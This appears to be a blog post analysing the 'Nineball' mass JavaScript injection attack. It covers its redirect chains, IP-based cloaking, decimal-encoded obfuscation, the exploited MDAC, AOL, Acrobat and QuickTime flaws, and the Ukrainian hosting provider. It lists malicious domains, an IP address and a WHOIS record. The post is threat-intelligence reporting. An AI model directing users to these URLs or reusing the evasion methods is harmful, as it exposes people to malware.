Nineball Injection Attack based in Russia

Websense Threatseeker is reporting a new obfuscated Javascript injection attack, this time affecting up to 40,000 websites.

If a user visits one of the infected sites, they are redirected through a series of different sites owned by the attacker and brought to the final landing page containing the exploit code …. The final landing page records the visitor’s IP address. When visited for the first time, the user is directed to the exploit payload site. But when visited again from the same IP address, the user is directed to the benign site of ask.com.

Javascript Obfuscation

The attack uses dynamically generated obfuscated code to avoid signature based AV products though it uses a static method of deobfuscation. Unlike Gumblar, whose code was in URL escaped format and was unescaped before exection, Nineball’s obfuscated code is based in decimal format and is deobfuscated using the String.charFromCode method.

Gumblar also replaced the % character with a dynamically selected (non-hex) character in an attempt to avoid the detection of escaped Javascript code. In a similar fashion, Nineball separates the decimal numbers of its obfuscated code with a character that is then used to split the code into an array of decimals for decoding.

Websense are reporting that the malware exploits a number of patched vulnerabilties:

After redirection, the exploit payload site returns highly obfuscated malicious code. The malicious code attempts to exploit MS06-014 (targeting MDAC) and CVE-2006-5820 (targeting AOL SuperBuddy), as well as employing exploits targeting Acrobat Reader and QuickTime. The MS06-014 exploit code will download a Trojan dropper with low AV detection rate. This dropper drops a dll with the name SOCKET2.DLL to Windows’ system folder. This file is used to steal user information. The malicious PDF file, served by the exploit site, also has very low AV detection rate.

The Exploitation

On my first visit to the landing page http://rnw.kz/index.php I was redirected through a series of sites to a final page of http://stopssse.info/l.php?pbr which reported a 500 Internal Server Error.

Visiting the initial landing page a second time results in redirection via http://bro.tw/in.cgi?3 and http://rmi.tw/in.cgi?6 to harmless search engine http://ask.com. Websense hypothesise that an IP cache is maintained to avoid delivering malicious content to the same machine twice.

A quick examination of a few of these domain names shows them all registered to Russian individuals and hosted on a single IP – 91.212.65.133 – possibly located in the Ukraine (a traceroute got as far as Russia and was then inconclusive).

Investigation of the IP hosting the first three domains using Robtex revealed a few more, including sovi.tw and molo.tw. These redirect, through a series of other domains to ask.com indicating that they perhaps share the same cache of infected IP addresses.

Redirections appear to be based partly on the domain and partly on the parameter passed to the script. The diagram below illustrates the redirections that I manged to map out manually.

With the exception of the end-page in the first chain investigated, all the domains associated with Nineball are hosted on the same IP and use dmdnssrv.info for DNS. This domain is also hosted on the same IP which is leased to Eurohost LLC:

inetnum:        91.212.65.0 - 91.212.65.255
netname:        EUROHOST-NET
descr:          Eurohost LLC
descr:          Provider Local Registry
country:        UA
remarks:
...
organisation:   ORG-EL76-RIPE
org-name:       Eurohost LLC
org-type:       OTHER
descr:          Eurohost LLC
address:        off. 1, 81 Frunze str.,
address:        Evpatoria, Crimea, Ukraine
phone:          +38 093 584 20 07
abuse-mailbox:  abuse@eurohost.biz.ua
e-mail:         office@eurohost.biz.ua
admin-c:        MI1858-RIPE
tech-c:         NOC114-RIPE
mnt-by:         EUROHOST-MNT
mnt-ref:        EUROHOST-MNT
changed:        noc@eurohost.biz.ua 20090611
source:         RIPE

role:           Network Operations Centre
address:        Evpatoria, Crimea, Ukraine
address:        off. 1, 81 Frunze str.,
e-mail:         noc@eurohost.biz.ua
admin-c:        MI1858-RIPE
tech-c:         MI1858-RIPE
nic-hdl:        NOC114-RIPE
changed:        mk@eurohost.biz.ua 20090303
source:         RIPE

person:         Mikhail Ignatyev
address:        off. 1, 81 Frunze str.,
phone:          +38 093 584 20 07
address:        Evpatoria, Crimea, Ukraine
nic-hdl:        MI1858-RIPE
mnt-by:         EUROHOST-MNT
changed:        noc@eurohost.biz.ua 20090611
source:         RIPE

Eurohost LLC, thought to be associated with recently departed UralNet, have been collecting bad press recently. A large number of malicious server are hosted in their /24 range (see malwaredomainlist.com). This comment is from the FireEye Malware Intelligence Lab who incidentally have a screenshot of a Wireshark dump from March that appears to have some Nineball obfuscated Javascript in it:

An AS that had been dormant (unrouted) for months came back online this week and immediately started hosting much of the malware that used to be on UralNet. They’ve only been back on the Bloc for a week, have a mere /24 (256 IPs), don’t have a corporate homepage, and yet, already have quite a few criminal customers.

and from wizcrafts.net:

Yesterday, April 30, 2009, when investigating a problem with an associate’s websites, I traced a cross site scripting iframe exploit, pointing to a malware middleman website at tojandglow.com, which redirects victims to a hostile server hosted in the Ukraine by Eurohost LLC. This Ukrainian server is currently dispensing malicious software that includes 9 Trojans, 7 scripting exploits and 1 virus.